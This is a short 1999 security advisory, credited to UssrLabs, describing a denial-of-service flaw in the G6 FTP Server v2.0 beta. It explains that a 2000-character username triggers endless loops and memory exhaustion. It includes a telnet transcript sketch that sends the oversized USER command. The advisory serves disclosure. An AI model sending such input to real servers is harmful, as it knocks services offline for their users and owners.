Remote DoS Attack against G6 FTP Server v2.0 (beta 4/5)
16 Nov. 1999
Summary
UssrLabs found a Local/Remote DoS Attack in G6 (Gene6) FTP Server v2.0 (beta 4/5). The buffer overflow is caused by a long user name of 2000 characters. After the large username is submitted to G6FTP, the FTP server will start to do infinite loops in the main program, causing it to start eating all available memory and computer resources, until there is no more memory and the computer will stop responding.
Credit:
This vulnerability has been discovered by: Ussr Labs.
[gimmemore@itsme]$ telnet example.com 21
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220-G6 FTP Server v2.0 (beta 5) ready ... USER {buffer)